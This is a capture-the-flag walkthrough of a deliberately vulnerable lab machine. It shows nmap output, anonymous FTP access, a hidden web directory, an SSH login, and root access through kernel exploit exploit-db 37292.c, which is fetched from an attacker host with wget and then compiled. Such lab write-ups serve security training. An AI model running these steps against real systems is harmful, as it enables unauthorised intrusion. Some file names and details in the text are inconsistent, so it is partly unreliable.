Recon / Enumeration:
using nmap -A -sV (version scan) -sC (service scan) 192.168.1.95
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-25 20:38 PDT
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 5.19% done; ETC: 20:38 (0:00:18 remaining)
Nmap scan report for 192.168.1.95
Host is up (0.00054s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.1.88
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 600
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
| 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:7D:BA:0F (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.54 ms 192.168.1.95
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.13 seconds
I see that the site has a /secret directory within robots.txt
Port 80 is also open, so that means there must be a web server.
We can also see that the FTP server has anonymous login enabled.
Let's see where this can lead us.
Here are my findings.
I need to do a get lol.cap to get the file off the ftp server.
We will get a message output like this:
Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!
So, let's try using http://192.168.1.95/sup3rs3cr3tdirlol and see what we get back.
We see an interesting file inside the super secret directory.
rolfmao
Once downloaded, we can see that it is an executable file.
root@kali:~/Downloads# chmod 777 roflmao
root@kali:~/Downloads# ./roflmao
Find address 0x0856BF to proceedroot@kali:~/Downloads#
We also see 0x0856BF as the address.
Let's see where we can use this technique.
Let's try to see if it can be used in the url.
http://192.168.1.95/0x0856BF/
Let's put it into hydra to test things out. All the users on the list didn't work automatically using hydra, so I had to try it manually by doing
ssh overflow@192.168.1.95
The password is actually Pass.txt
So, now, it's time for privilege escalation.
Let's now try an exploit-induced privilege escalation.
We can enumerate the Ubuntu version of the system and then gather an exploit for that.
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.1 LTS
Release: 14.04
Codename: trusty
$ uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
It looks like that we need to find a matching exploit for Linux kernel 3.13.0.32 < 3.19.
Now, we must do a cp /usr/share/exploitdb/exploits/linux/local/37292.c . (copy the file into the current directory)
Gathering the info we need, we must now compile the c exploit on the machine.
But, first, we need to set up a Python web server on the directory we choose to contain the exploit.
python -m SimpleHTTPServer 80
$ cd /tmp
$ ls$ wget http://192.168.1.88/37292.c
--2019-07-25 22:47:41-- http://192.168.1.88/37292.c
Connecting to 192.168.1.88:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
Saving to: ‘37292.c’
100%[======================================>] 5,119 --.-K/s in 0s
2019-07-25 22:47:41 (448 MB/s) - ‘37292.c’ saved [5119/5119]
$ ls
37292.c
$ gcc 37292.c -o exploit
$ ls
37292.c exploit
$ ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root
# cd /root
# ls
proof.txt
# cat proof.txt
Good job, you did it!
702a8c18d29c6f3ca0d99ef5712bfbdc
Finally, r00ted this box and I am in. :)
No comments:
Post a Comment